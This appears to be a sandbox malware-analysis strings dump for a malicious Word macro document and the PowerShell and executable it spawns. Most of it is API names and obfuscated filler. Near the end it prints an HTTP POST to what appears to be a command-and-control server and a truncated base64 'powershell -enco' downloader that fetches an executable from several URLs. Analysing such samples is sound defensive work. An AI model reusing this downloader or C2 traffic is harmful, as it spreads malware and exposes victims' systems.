Unicode based on Memory/File Scan (powershell.exe , 00025715-00002684.00000000.26041.3FC60000.00000002.mdmp)

lientRect

Ansi based on Dropped File (897.exe.2547852437)

listeners: [],

llit olBa`+rr 3eneElPlPT984T@ac10\1 wzu<$496pXen@Kpan$,TurkiJLirapLxygy CloYg me

Ansi based on Hybrid Analysis (97dbf6429c8a30409272c98cb8906656454885de9bc7396b54a0dfd86de0429f.doc.bin)

Load More</a>

LoadLibraryExW

Ansi based on Memory/File Scan (powershell.exe , 00025715-00002684.00000000.26041.3FC51000.00000020.mdmp)

LoadResource

Ansi based on Memory/File Scan (powershell.exe , 00025715-00002684.00000000.26041.3FC51000.00000020.mdmp)

LoadStringW

Ansi based on Memory/File Scan (powershell.exe , 00025715-00002684.00000000.26041.3FC51000.00000020.mdmp)

LocalFree

Ansi based on Memory/File Scan (powershell.exe , 00025715-00002684.00000000.26041.3FC51000.00000020.mdmp)

lstrcpyW

Ansi based on Dropped File (897.exe.2547852437)

lxuv\I$m,}JS+g2Exq__&pLi=cX)kww1755cPRUK}'F@yM5U4)z5~:>::g\GUV@g;`&nYMQc\Tb|igkL}kqv<w/hgwm7gucdm`?1VSNS,nms*(H5u%>txJnMtOMr6#6g$NJZ-f=Nm:#KkZl[O\'z/)j|

Ansi based on Hybrid Analysis (97dbf6429c8a30409272c98cb8906656454885de9bc7396b54a0dfd86de0429f.doc.bin)

l|wWmmi\571N6:|?{|kurN;1ak2v,{1tHrZcz/=}/.

Ansi based on Hybrid Analysis (97dbf6429c8a30409272c98cb8906656454885de9bc7396b54a0dfd86de0429f.doc.bin)

m) Wdit Cau(W La ke on0

Ansi based on Hybrid Analysis (97dbf6429c8a30409272c98cb8906656454885de9bc7396b54a0dfd86de0429f.doc.bin)

m*wvIQZGJY-5#s}^ri:iklFm%Hie|U/IHj~*K^micfR+i#uQeWO?+l5/}%$jDghZS[R5+sOky_(&yrU]$-WTd&#j*7"2MEm~=98z>-/z_=^pz{U5:6M^!V4VR0sztvcJvEb>?:WJ[}sb.(r\rs7

Ansi based on Hybrid Analysis (97dbf6429c8a30409272c98cb8906656454885de9bc7396b54a0dfd86de0429f.doc.bin)

M1_m0__ci

Ansi based on Image Processing (screen_16.png)

M5/\;5;L|Q\8Wb6j=C+q,}6{{dby:94S+syw[uO<4UyQ"+_;`{T,1qvjz)E.}s6Kk5a

Ansi based on Hybrid Analysis (97dbf6429c8a30409272c98cb8906656454885de9bc7396b54a0dfd86de0429f.doc.bin)

M7Bt3=Vk<9pzP-TGfuMf8JTn[,TV2f9WxlzcmE&cGeXvOv2|O\F

Ansi based on Hybrid Analysis (97dbf6429c8a30409272c98cb8906656454885de9bc7396b54a0dfd86de0429f.doc.bin)

m[VooE;oduZ-)I_wT>E:A&ZXVD#"r,3m

Ansi based on Hybrid Analysis (97dbf6429c8a30409272c98cb8906656454885de9bc7396b54a0dfd86de0429f.doc.bin)

Malagasy_Arilpts ?wdrawalwlm7pp %g

Ansi based on Hybrid Analysis (97dbf6429c8a30409272c98cb8906656454885de9bc7396b54a0dfd86de0429f.doc.bin)

MapViewOfFile

Ansi based on Memory/File Scan (powershell.exe , 00025715-00002684.00000000.26041.3FC51000.00000020.mdmp)

margin: 0 .07em !important;

Marketsbij"zwhitezfzPgeneratejwh

Ansi based on Hybrid Analysis (97dbf6429c8a30409272c98cb8906656454885de9bc7396b54a0dfd86de0429f.doc.bin)

Max Display

Unicode based on Runtime Data (WINWORD.EXE )

MaxFileSize

Unicode based on Runtime Data (powershell.exe )

MdcCheckBoxEvents

Unicode based on Runtime Data (WINWORD.EXE )

MdcComboEvents

Unicode based on Runtime Data (WINWORD.EXE )

MdcListEvents

Unicode based on Runtime Data (WINWORD.EXE )

MdcOptionButtonEvents

Unicode based on Runtime Data (WINWORD.EXE )

MdcTextEvents

Unicode based on Runtime Data (WINWORD.EXE )

MdcToggleButtonEvents

Unicode based on Runtime Data (WINWORD.EXE )

micr0_0ftw0rd

Ansi based on Image Processing (screen_16.png)

micr0c0_w0rd

Ansi based on Image Processing (screen_8.png)

Microsoft

Ansi based on Image Processing (screen_16.png)

Microsoft Forms 2.0 Object Library

Unicode based on Runtime Data (WINWORD.EXE )

Microsoft.PowerShell.UnmanagedPSEntry

Unicode based on Memory/File Scan (powershell.exe , 00025715-00002684.00000000.26041.3FC51000.00000020.mdmp)

mit<zwp`a8(232`D8b`ypassY@(c wuctu X1uthe`Wma0trixAeexud!GB DigiA8dd8G@H@x^in asymmec lime@"Baby Jewelery Group dr@3r NakPfa Dg Nyh KoreW@hprod ivoHTTP Pennsylvd-toL-*di @(m9#mb`Wpelhub,"283!RAM array`xt>-:`@J9 WeAorchidaZ cus@EBTBo DJuncs@&index @(t gGeDyp New Ze@naocess im$ve"@mR6v(A8wesac

Ansi based on Hybrid Analysis (97dbf6429c8a30409272c98cb8906656454885de9bc7396b54a0dfd86de0429f.doc.bin)

mm"5"'}\<t:

Ansi based on Hybrid Analysis (97dbf6429c8a30409272c98cb8906656454885de9bc7396b54a0dfd86de0429f.doc.bin)

mO0- mid8dleZDsolftAftk.pQC) DenPOrgc gridpFd O0`D0%O0/ji IWMPgA(DP unCK

Ansi based on Hybrid Analysis (97dbf6429c8a30409272c98cb8906656454885de9bc7396b54a0dfd86de0429f.doc.bin)

Module=bluezij

Ansi based on Hybrid Analysis (97dbf6429c8a30409272c98cb8906656454885de9bc7396b54a0dfd86de0429f.doc.bin)

Module=functionalitiestfi

Ansi based on Hybrid Analysis (97dbf6429c8a30409272c98cb8906656454885de9bc7396b54a0dfd86de0429f.doc.bin)

Module=Humanaoo

Ansi based on Hybrid Analysis (97dbf6429c8a30409272c98cb8906656454885de9bc7396b54a0dfd86de0429f.doc.bin)

mop{Ng5['m3m_wz[q9tcMpx

Ansi based on Hybrid Analysis (97dbf6429c8a30409272c98cb8906656454885de9bc7396b54a0dfd86de0429f.doc.bin)

MotorwayubwO$79@$SkJ aw

Ansi based on Hybrid Analysis (97dbf6429c8a30409272c98cb8906656454885de9bc7396b54a0dfd86de0429f.doc.bin)

Mov(GtUCPhIkClo09rRubbeF'NGlnfrLt6 Cliff paeqo2idnonB!7culAd@-Qa`` D@r7oYU}e6sPu 301IB2BPqrf_I0hl?sadtae b<Assb"_a,~%R`SRiinCf;__Shoe0slnw_'84V6'eSd=jsVmGsGo

Ansi based on Hybrid Analysis (97dbf6429c8a30409272c98cb8906656454885de9bc7396b54a0dfd86de0429f.doc.bin)

Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)

Ansi based on PCAP Processing (PCAP)

mscoree.dll

Ansi based on Memory/File Scan (powershell.exe , 00025715-00002684.00000000.26041.3FC51000.00000020.mdmp)

MSOBALLOON

Unicode based on Runtime Data (WINWORD.EXE )

MsoHelp10

Unicode based on Runtime Data (WINWORD.EXE )

mspim_wnd32

Unicode based on Runtime Data (WINWORD.EXE )

msvcrt.dll

Ansi based on Memory/File Scan (powershell.exe , 00025715-00002684.00000000.26041.3FC51000.00000020.mdmp)

MSWordDocWord.Document.89qx666666666vvvvvvvvv666666>6666666666666666666666666666666666666666666666666hH66666666666666660666666666666666666666666666666666666666666666606p02&6FVfv2(&6FVfv&6FVfv&6FVfv&6FVfv&6FVfv&6FVfv8XV~ 0@ 0@ 0@ 0@ 0@ 0@ 0@ 0@ 0@ 0@ 0@ 0@ 0@ 0@66666OJQJ_HmHnHsHtHJ`JNormaldCJ_HaJmHsHtHDA D

Ansi based on Hybrid Analysis (97dbf6429c8a30409272c98cb8906656454885de9bc7396b54a0dfd86de0429f.doc.bin)

multiby tecjiY=Len("402"=!e toAe RusXEMalawi Met@`

Ansi based on Hybrid Analysis (97dbf6429c8a30409272c98cb8906656454885de9bc7396b54a0dfd86de0429f.doc.bin)

MultiByteToWideChar

Ansi based on Dropped File (897.exe.2547852437)

MultiPageEvents

Unicode based on Runtime Data (WINWORD.EXE )

n#$G:6WL4|yz}.G_{[oN].1g scm5!W?n

Ansi based on Hybrid Analysis (97dbf6429c8a30409272c98cb8906656454885de9bc7396b54a0dfd86de0429f.doc.bin)

N.9Rj&]5U?7Q{]e8o}toN.mjd=ex]'O|xwtQ;-2ljNK@e^\FH<(S"n/'-=l

Ansi based on Hybrid Analysis (97dbf6429c8a30409272c98cb8906656454885de9bc7396b54a0dfd86de0429f.doc.bin)

n6h']u_hzZ

Ansi based on Hybrid Analysis (97dbf6429c8a30409272c98cb8906656454885de9bc7396b54a0dfd86de0429f.doc.bin)

n>r+OY^4I{!<eyu~j5RVUs)AFy?ucL^*mZg:FmI2^~~yYi[a[=]t=ny-z6l'U7|Oh{%Od.w}p[F<C_O6]'4:?YwZ'k@%$yGkrql1|9ho?7muE>K%aglrejKz^t^,_UG2P6Kc82SS:#?qy%Kz&ookMS5z64[_PgZt,{wKLteGo44/8SNurZ&)ifr}

Ansi based on Hybrid Analysis (97dbf6429c8a30409272c98cb8906656454885de9bc7396b54a0dfd86de0429f.doc.bin)

Name="Project"

Ansi based on Hybrid Analysis (97dbf6429c8a30409272c98cb8906656454885de9bc7396b54a0dfd86de0429f.doc.bin)

navigatingadrBooksmod+Woodenjphk

Ansi based on Hybrid Analysis (97dbf6429c8a30409272c98cb8906656454885de9bc7396b54a0dfd86de0429f.doc.bin)

ndacB5dvan XIsl=@7bv8estOdi:c7Av am@oa Toy@9Bo"C; empo(wer`fd cJnerlRy@U ng

Ansi based on Hybrid Analysis (97dbf6429c8a30409272c98cb8906656454885de9bc7396b54a0dfd86de0429f.doc.bin)

ne RefinSt(eelCu<Glob]JPea e- 9me#Timor-Les1Hs E

Ansi based on Hybrid Analysis (97dbf6429c8a30409272c98cb8906656454885de9bc7396b54a0dfd86de0429f.doc.bin)

Network 3

Unicode based on Runtime Data (capprep.exe )

New_Yorkrfh538!dBWvDam MoniK`2SpP4Ar7t |rpue FTP F6EES'L&Toy pen-source@way A`pplic@ysEt8<ziaCStr(LicensePdhrw ^dGL`ight Zm ethodl withdraw

Ansi based on Hybrid Analysis (97dbf6429c8a30409272c98cb8906656454885de9bc7396b54a0dfd86de0429f.doc.bin)

NextUpdate

Unicode based on Runtime Data (WINWORD.EXE )

ney MarketAcrafKeyboard Globhen hance(Liais4Cubaq

Ansi based on Hybrid Analysis (97dbf6429c8a30409272c98cb8906656454885de9bc7396b54a0dfd86de0429f.doc.bin)

nGlobal Fantastic Steel Ball Lead payment transitional Savings Account Bedfordshire invoice Illinois synthesizeh @846'^CYAwesome Metal Salad bus invoice whiteboard B2B Gorgeous Granite Table transmit generatingubiquitous internet solution transmitter knowledge user parsing Metal Implementation Berkshire deposit Alaska unleash salmon Inlet @450'`4Gorgeous Danish Krone lime initiatives embrace challenge Unbranded Granite Computer Fantastic New York next-generation back up calculateOJregional Persistent feed Markets protocol THX navigate product copying tan @ dX 'b4{Technician Bedfordshire Manat Books, Computers & Health withdrawal Mississippi Personal Loan Account index Ferry panel Flat~oPorts Incredible Rubber Chair applications national Glens Chief Quality Health & Kids Distributed azure invoice@Tasty Rubber Gloves Object-based Ergonomic Concrete Keyboard generating communities Licensed Refined Fresh Pants Health, Outdoors & Electronics h'fcross-platform TCP Monitored multimedia parse Fords Architect Gorgeous quantifying neural methodologies Open-source web-readinessi=iX R6161616161616161616161winmgmt61616161s:Win32_616161616161Proce616161616161616161ss$V$V$l.j f R p r t j%n'f

Ansi based on Hybrid Analysis (97dbf6429c8a30409272c98cb8906656454885de9bc7396b54a0dfd86de0429f.doc.bin)

nitolove GorgeouDs 7 la@der parse@ archintuZMoney MarketAdons b@widcomp&s2OecdlDfo747ROI cAUnie@kR GF# DCoratOM@+N@tt@1mobilIay F(hD@adigms Persl Loan8ReA300progrA@rcircumfuchsia a(ppltneuld}BacA

Ansi based on Hybrid Analysis (97dbf6429c8a30409272c98cb8906656454885de9bc7396b54a0dfd86de0429f.doc.bin)

Nkk2zY jc7|hw]J-4ve]gi}b>pG&l#[qc>zpF5RPkjO|\zZ-iY'EPDk/[nZ-w#%;7

Ansi based on Hybrid Analysis (97dbf6429c8a30409272c98cb8906656454885de9bc7396b54a0dfd86de0429f.doc.bin)

nknowledge bas0S)cXencod#a6 AvUDalasiParadigm A@Yique 8QE'Desig!`eaml qil ' KpPks`|l $3bqwid01n |PaPaSMt``MHe-b@F_paKwu0cky JPrern2@xthdraw`Rh e0a%fA'si r Y1Co/#c@ColpqcP,l-Isri{= tLt PCI ProuQ3=UFCxS dSACiVon-ori0(i\Ch

Ansi based on Hybrid Analysis (97dbf6429c8a30409272c98cb8906656454885de9bc7396b54a0dfd86de0429f.doc.bin)

nlORGFuIdi_Prdiz2Tpy1Ybvhpk&PerPGmgglobco#Develp9r6;moOteIaar82Bbp0al-t&Q0YVi0a:eSd u>p`tQ fPLlR SNdY0HMus?WaC<aGe'&@

Ansi based on Hybrid Analysis (97dbf6429c8a30409272c98cb8906656454885de9bc7396b54a0dfd86de0429f.doc.bin)

nlzr, upwtrjtc,Vkkj@ m/mobi lezvjvalue-add@impactfulv Brunei Dollar SAS 'OFrozen!]ckWalknHome lviol@5primG mi@ogKn dep@osit

Ansi based on Hybrid Analysis (97dbf6429c8a30409272c98cb8906656454885de9bc7396b54a0dfd86de0429f.doc.bin)

Non@ '(/Sm_{_H atahl#ClHoth@ &Ihndu@wiI@aA*net sK Prairie D@.ct dis-mAR@archHozMBCB Funi!CoorLat0or BI

Ansi based on Hybrid Analysis (97dbf6429c8a30409272c98cb8906656454885de9bc7396b54a0dfd86de0429f.doc.bin)

Normal.dotm1Microsoft Office Word@@nz@nz6}_*zI/gEJFoY@z#i7E}iU?MQ?jK:nq?<}U}JCO_V{zIK*zI>~%Y@z!'/=D=$%gD=U}JCO_V{zIK*zI>~%Y@z!'/=D=$%gD=U}JCO_V{zIK*zI>~%Y@z!'/=D=$%gD=U}JCO_V{zIK*zI>~%Y@z!'/=D=$%gic:|9_nCm"Z|G~V6/}3 cvn$]+>UtV{?Ido?rO@z!iWj{?HYGoW@z#7D=hMQ?jD}&(5~>}OzI'_EFGoW@#{-U}JCO_V{zIK*zI>~%Y@z!'/=D=$%gD=U}JCO_V{zIK*zI>~%Y@z!'/=D=$%gD=U}JCO_V{zIK*zI>~%Y@z!'/=D=$%gD=U}JCO_V{zIK*zI>~%Y@z!'/=D=$%gD=U}JCO_V{zIK*zI>~%Y@z!'/=D=$%gD=U}JCO_V{zIK*zI>~%Y@z!'/=D=$%gD=U}JCO_V{zIK*zI>~%Y@z!'/=D=$%gD=U}JCO_V{zIK*zI>~%Y@z!'/=D=$%gD=U}JCO_V{zIK*zI>~%Y@tk;wg8v<?v_:C8|8`.N%<CX?}oW\6Cw~\[IU3dXZ91to_-52X_6iScM#_45%|nNH_OJ7Et^"/]|Wz"L.Z{

Ansi based on Hybrid Analysis (97dbf6429c8a30409272c98cb8906656454885de9bc7396b54a0dfd86de0429f.doc.bin)

nsoleHostAssemblyName

Unicode based on Memory/File Scan (powershell.exe , 00025715-00002684.00000000.26041.3FC51000.00000020.mdmp)

Ntuw/,8APue0l`}ra44liff s Newuiw04$FR]-@1P$od) &b UsaPitp'HRap!Ug<aPo3PagLux!e-w Zus*Oys0-tze harn{Pn`KeyDbo

Ansi based on Hybrid Analysis (97dbf6429c8a30409272c98cb8906656454885de9bc7396b54a0dfd86de0429f.doc.bin)

NY3<n2=}

Ansi based on Hybrid Analysis (97dbf6429c8a30409272c98cb8906656454885de9bc7396b54a0dfd86de0429f.doc.bin)

O'>agYeHj*kblC=hPW!alfpX OAXl:XVZbr

Ansi based on Hybrid Analysis (97dbf6429c8a30409272c98cb8906656454885de9bc7396b54a0dfd86de0429f.doc.bin)

O)xNO-k>qK6OSlWc[5(UIQYi/

Ansi based on Hybrid Analysis (97dbf6429c8a30409272c98cb8906656454885de9bc7396b54a0dfd86de0429f.doc.bin)

O+$6_k>qz92{^cu%<Ua={L_S5;_z>D6^a; "kCcn*,0ftcc\lplx:JN}Y3,4dm;fZboG(mG7>u>nO Ok>$v:Z=!WsO

Ansi based on Hybrid Analysis (97dbf6429c8a30409272c98cb8906656454885de9bc7396b54a0dfd86de0429f.doc.bin)

O>5bj)a%D8=}j!m?#RzuuCr73=-r}?TMR(Sn2++4XwDT{a}jAj5*/7fz

Ansi based on Hybrid Analysis (97dbf6429c8a30409272c98cb8906656454885de9bc7396b54a0dfd86de0429f.doc.bin)

O>5umL.mHub1%#eEz6Jk_Zrbm8=><4|'XYvD tI1Zb\\\^<-?CE#|-LsG23W6Cju60V(\ho)1iU+h<:?&$O_E)6.Oo~P!,y[TVm[WR;+bvrmY1R74(f]OKSz(U:w-rnDWm WER|}gwuwhkoz3>{E+=Wm K

Ansi based on Hybrid Analysis (97dbf6429c8a30409272c98cb8906656454885de9bc7396b54a0dfd86de0429f.doc.bin)

o?EzIfnk"=1;7gwm{z>8Uq:[~]*Z=lhfbGn.-_.w'/raHzC63H[:G8186=38MkS&:l|jkwr\[=;j)vT7zYbG/cc'&Fl_n6K&/<5`RRaiGOxLU2R'd~yC"i<k;7y=ufJsUtn(|n:Pv=blvucLc;X'TF~..Vdx^<-?BT8ZweLAq?;pqE/]vw*]#^:=?_bzJjZJpG69]7ogl>L~XZ^iWI:czCcJM:-{:-%bY]/:~TYxmwFDwY}n\3X<lk&c>LvbI^\<9?iYGPGQ3;5Tcxl}>o~~g+6mR"4y'E~R|z\e?+k'hZ:Ew$_|u")+:}k[:&MOgMXrv_nMXr2?

Ansi based on Hybrid Analysis (97dbf6429c8a30409272c98cb8906656454885de9bc7396b54a0dfd86de0429f.doc.bin)

O^z~kW:hi?*6/AO?CS#$7{vk<=[zm8g(R/I5z{k?s^O:l{d47Je*adg'3h|Q~?_g$YMe{n}9ujJ8m#]]\?#r,nKmyk+"5WTTK+:$#J^5=F5U58"?Sw~vi+mz+s-4kRvv|l_=>0e&}bc|ZvLUx1)}<xk:kCOzcL4L7A]~sPJvRDMTrx?m5)z[r{gZn^~1Lvskp~tSO%>n?.N

Ansi based on Hybrid Analysis (97dbf6429c8a30409272c98cb8906656454885de9bc7396b54a0dfd86de0429f.doc.bin)

O`+fdsoe|Eo\sN+e\_ggzk18rboZdlUNteQ\o*/9cwgW5&vd^3ZGo|cm53kOg(HE-ItgjI4

Ansi based on Hybrid Analysis (97dbf6429c8a30409272c98cb8906656454885de9bc7396b54a0dfd86de0429f.doc.bin)

obalUnlock

Ansi based on Dropped File (897.exe.2547852437)

oD.r0xEiF@`

Ansi based on Hybrid Analysis (97dbf6429c8a30409272c98cb8906656454885de9bc7396b54a0dfd86de0429f.doc.bin)

OIu@u^f-'

Ansi based on Hybrid Analysis (97dbf6429c8a30409272c98cb8906656454885de9bc7396b54a0dfd86de0429f.doc.bin)

ole32.dll

Ansi based on Memory/File Scan (powershell.exe , 00025715-00002684.00000000.26041.3FC51000.00000020.mdmp)

OLEAUT32.dll

Ansi based on Memory/File Scan (powershell.exe , 00025715-00002684.00000000.26041.3FC51000.00000020.mdmp)

OleCreate

Ansi based on Dropped File (897.exe.2547852437)

On Err!Resu@QNext

Ansi based on Hybrid Analysis (97dbf6429c8a30409272c98cb8906656454885de9bc7396b54a0dfd86de0429f.doc.bin)

On Error ResuhNext

Ansi based on Hybrid Analysis (97dbf6429c8a30409272c98cb8906656454885de9bc7396b54a0dfd86de0429f.doc.bin)

On Error Resume Next

Ansi based on Hybrid Analysis (97dbf6429c8a30409272c98cb8906656454885de9bc7396b54a0dfd86de0429f.doc.bin)

On Error ResuNext

Ansi based on Hybrid Analysis (97dbf6429c8a30409272c98cb8906656454885de9bc7396b54a0dfd86de0429f.doc.bin)

on: function (event, callback) {

opacity: 0;

opacity: 1;

Opensourceatz

Ansi based on Hybrid Analysis (97dbf6429c8a30409272c98cb8906656454885de9bc7396b54a0dfd86de0429f.doc.bin)

Operating System

Unicode based on Memory/File Scan (powershell.exe , 00025715-00002684.00000000.26041.3FC60000.00000002.mdmp)

OptionFrameEvents

Unicode based on Runtime Data (WINWORD.EXE )

opWpons-0

Ansi based on Hybrid Analysis (97dbf6429c8a30409272c98cb8906656454885de9bc7396b54a0dfd86de0429f.doc.bin)

oQPdvq7za 2byHTA09SnochHG5%_8_ Qpcuq1BedfOTr`%dP T@go?jonIuPgorpZterf[ s cli-serD LegacUnzHps JeBR,vau.&& .CPusmbfo"c`groEx@V(N@C4 THX S

Ansi based on Hybrid Analysis (97dbf6429c8a30409272c98cb8906656454885de9bc7396b54a0dfd86de0429f.doc.bin)

overridingiua.15Calibri

Ansi based on Hybrid Analysis (97dbf6429c8a30409272c98cb8906656454885de9bc7396b54a0dfd86de0429f.doc.bin)

P0=D<E-KV0Q=y2Swo-F^S=\K35ZA.9EY/r=Qc-~6Z/mt-fm6{_+5i|8G>K9j]3qwi*i

Ansi based on Hybrid Analysis (97dbf6429c8a30409272c98cb8906656454885de9bc7396b54a0dfd86de0429f.doc.bin)

p7x SQL Turnpike Togo

Ansi based on Hybrid Analysis (97dbf6429c8a30409272c98cb8906656454885de9bc7396b54a0dfd86de0429f.doc.bin)

p:fez#b^ee

Ansi based on Memory/File Scan (powershell.exe , 00025715-00002684.00000000.26041.3FC60000.00000002.mdmp)

p@ ili`attitude#B EU,Idaho"Pers l_5[nvw

Ansi based on Hybrid Analysis (97dbf6429c8a30409272c98cb8906656454885de9bc7396b54a0dfd86de0429f.doc.bin)

p@g!greydfh36Q0RubbS0.s UtahBujhamTV0y*asym/FacilGD@t?rm*vel@r08bEs4

Ansi based on Hybrid Analysis (97dbf6429c8a30409272c98cb8906656454885de9bc7396b54a0dfd86de0429f.doc.bin)

pA?lo1080psbdPicture 1lo1080psbd"RZ]?MsFZ]?MJFIFLExifII*(Bweb_servicessltSurinam_DollarjprPlacefmcC

Ansi based on Hybrid Analysis (97dbf6429c8a30409272c98cb8906656454885de9bc7396b54a0dfd86de0429f.doc.bin)

padding: 0 !important;

pagiLayaut

Ansi based on Image Processing (screen_16.png)

PagiLayaut

Ansi based on Image Processing (screen_8.png)

Paragraph

Ansi based on Image Processing (screen_8.png)

parsingmls;Fiji_Dollarsjk5(Toystcjpinkwhp)_B_var_Refined_Steel_Tabledbhredundantbrjh

Ansi based on Hybrid Analysis (97dbf6429c8a30409272c98cb8906656454885de9bc7396b54a0dfd86de0429f.doc.bin)

pay!%vzs;67a;Spurs GlO`oub

Ansi based on Hybrid Analysis (97dbf6429c8a30409272c98cb8906656454885de9bc7396b54a0dfd86de0429f.doc.bin)

payBook!& Be@y S$7EAm oHdyd d/`GIdible "\ 0cu@mp@S2qGPAssotinodvz85qH`-` tOu|dex app@Rs 4geshire Metical orange enterprise Bedfor

Ansi based on Hybrid Analysis (97dbf6429c8a30409272c98cb8906656454885de9bc7396b54a0dfd86de0429f.doc.bin)

paymentlbugHandcrafted_Metal_Pantswzzmultibyteapcldeliverablescininfrastructureswzd&

Ansi based on Hybrid Analysis (97dbf6429c8a30409272c98cb8906656454885de9bc7396b54a0dfd86de0429f.doc.bin)

paymentozn{purpleizqinfomediariestidcompressingcjrsexykqzmissioncriticaljuzKroonnzp+Buckinghamshirebwwindexwbz^

Ansi based on Hybrid Analysis (97dbf6429c8a30409272c98cb8906656454885de9bc7396b54a0dfd86de0429f.doc.bin)

paymentrjmoptimizejbbSindigoqssoscalepuwprogrammingzjoDirectzzpc

Ansi based on Hybrid Analysis (97dbf6429c8a30409272c98cb8906656454885de9bc7396b54a0dfd86de0429f.doc.bin)

paymentsttEurotlh/Futureproofedmks&BuckinghamshirewszpscaleokaHumandriMinnesotamqz#Fantastic_Cotton_BaconslzCoursepkdTasty_Granite_Chaircpp{

Ansi based on Hybrid Analysis (97dbf6429c8a30409272c98cb8906656454885de9bc7396b54a0dfd86de0429f.doc.bin)

paymentvzs{

Ansi based on Hybrid Analysis (97dbf6429c8a30409272c98cb8906656454885de9bc7396b54a0dfd86de0429f.doc.bin)

paymentwzrz

Ansi based on Hybrid Analysis (97dbf6429c8a30409272c98cb8906656454885de9bc7396b54a0dfd86de0429f.doc.bin)

Pebco+`400QAMovP,a"u& OSr i LanRupee]rQ(2b0g@yW_ReyQ's0h1080p &q)R@R%9plugPy Gu@le` DenmbeP0ZF it_ Card_Cowff#297qi?ti!iPiip|pi0|`aSm1X! eCU;'pAoCfMKc`huset #d3ggQM/erprav`(hod8A)`ics Concrete Row Burg

Ansi based on Hybrid Analysis (97dbf6429c8a30409272c98cb8906656454885de9bc7396b54a0dfd86de0429f.doc.bin)

pgbZn}>Wm,.DoER2.|XuS/@9|~MKKv7Xd*7tVl8Wm[n];;5wsE6osI3?S\ZGDE7|LB6X*d+"cwvDe+:Ym{GS.<7nRf|?w),>5S29n!\-u%^fS|^M_7-FO]nYXG3=anlfuFGf;JWo

Ansi based on Hybrid Analysis (97dbf6429c8a30409272c98cb8906656454885de9bc7396b54a0dfd86de0429f.doc.bin)

ph`c@l_M,,0jjgj ;hb

Ansi based on Hybrid Analysis (97dbf6429c8a30409272c98cb8906656454885de9bc7396b54a0dfd86de0429f.doc.bin)

Pji3Ym68WWyPpj%0aZ Ex|clD$W{9@CSF@XlKdpriFm]0reb] UNepEMulti-chan0 l'Home{E*-pJ D0r@kiti*9j

Ansi based on Hybrid Analysis (97dbf6429c8a30409272c98cb8906656454885de9bc7396b54a0dfd86de0429f.doc.bin)

placeholder="Search …"

PlaySoundA

Ansi based on Dropped File (897.exe.2547852437)

Pma0.U#rt sky#'o2H_XOSL0w7doChair' | H7G)?ET

Ansi based on Hybrid Analysis (97dbf6429c8a30409272c98cb8906656454885de9bc7396b54a0dfd86de0429f.doc.bin)

Popular</a>

POST /dma/usbccid/sess/ HTTP/1.1Referer: http://172.105.11.15/dma/usbccid/sess/Content-Type: application/x-www-form-urlencodedDNT: 1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 172.105.11.15:8080Content-Length: 475Connection: Keep-AliveCache-Control: no-cache1MIehVKZtKVQCnesve=VfJ92nn2RR0tVIHBYbY37ic55vwcWc4wxUpcJPNaj7l8n8Q2hFoxZosMmutaIEzyZ1RVqs5nChjRHEDP3xMDSJY5aRk3I4B1G7AtRq6g%2B1O77YRFUuZSYRdYnopu%2B4LIAvMwhT6dCEuRLohcy4cW6lYOlMqD4%2B5vge5EeMqZbHKXU1fJrmwByDWk7vtucWsW9OtSOsA19zSM5hPiV6y9p6ANxcDidBd5oy1Ya7WPUQh2HNpBjUrH59%2BZroZ1%2FmHddQxpMZ3YAdMi5NSzIheGcglXgD%2BbeMjDRMXmauGldUOB5DQr3XyKUxot%2F1LY7hLzR2Negv1fMreG21bRxBcVAn3eBgn95ff2FXN0%2BaCw8SJ7uPCDB%2FHz4n%2Fo7RkIv53SB4jAq1mvjjPbnRx2zafEbgM7A28pAMTj6ZLvM%2Fgz%2Br1qElyi

Ansi based on PCAP Processing (PCAP)

PostQuitMessage

Ansi based on Dropped File (897.exe.2547852437)

powershell -enco PAAjACAAaAB0AHQAcABzADoALwAvAHcAdwB3AC4AbQBpAGMAcgBvAHMAbwBmAHQALgBjAG8AbQAvACAAIwA+ACAAJABtAG8AdABpAHYAYQB0AGkAbgBnAHEAdQBxAD0AJwBJAG4AdABlAGwAbABpAGcAZQBuAHQAYgBxAHYAJwA7ACQAbQBvAGQAZQBsAHMAdgBoAHoAIAA9ACAAJwA4ADkANwAnADsAJABBAHMAcwBpAHMAdABhAG4AdABvAHAAegA9ACcASABhAG4AZABjAHIAYQBmAHQAZQBkAGMAcgBkACcAOwAkAHMAbwBsAGkAZABfAHMAdABhAHQAZQB6AGMAaAA9ACQAZQBuAHYAOgB1AHMAZQByAHAAcgBvAGYAaQBsAGUAKwAnAFwAJwArACQAbQBvAGQAZQBsAHMAdgBoAHoAKwAnAC4AZQB4AGUAJwA7ACQAcABsAHUAbQBrAHEAagA9ACcAVQBTAF8ARABvAGwAbABhAHIAagBzAHoAJwA7ACQAZwByAGUAZQBuAGoAdwBhAD0ALgAoACcAbgAnACsAJwBlAHcAJwArACcALQBvAGIAJwArACcAagBlAGMAdAAnACkAIABuAGUAVAAuAHcAZQBiAEMATABpAGUAbgBUADsAJABSAHUAcwB0AGkAYwBfAEMAbwB0AHQAbwBuAF8ARgBpAHMAaABzAHYAbAA9ACcAaAB0AHQAcAA6AC8ALwB3AHcAdwAuAGUAdABlAGUAbgBzAGIAbABvAGcALgBjAG8AbQAvADIAdABnAG0AbgBrAC8AZgBKAFoASQBQAEMAWQBWAC8AQABoAHQAdABwADoALwAvAHcAdwB3AC4AcABhAGwAaQBzAGUAawAuAGMAegAvAHcAcAAtAGkAbgBjAGwAdQBkAGUAcwAvAFkAdABnAEoAYgBXAFEATgB0AEoALwBAAGgAdAB0AHAAOgAvAC8AdwB3AHcALgBtAG4AbQBpAG4AZgByAGEAcwBvAGwAdQB0AGkAbwBuAHMALgBjAG8AbQAvAHcAcAAtAGEAZABtAGkAbgAvAHoAZQB0AGUAWABlAEoAWQBDAC8AQABoAHQAdABwADoALwAvAGEAYgBiAGEAcwBhAHIAZwBvAG4ALgBjAG8AbQAvAHcAcAAtAGEAZABtAGkAbgAvAHMAcQBoAHoAdABqADQAXwBkAHoAcQAzAGUALQAwADEAOQA4ADAAMgAxADUANQAvAEAAaAB0AHQAcABzADoALwAvAHcAZQBpAHEAaQBuAGcANwAuAGMAbwBtAC8AZQB4ADYALwAzAHIAMgBqAHMAXwBvAGMAZwByADMAYgBlAHcAOAA3AC0ANQAzADgAN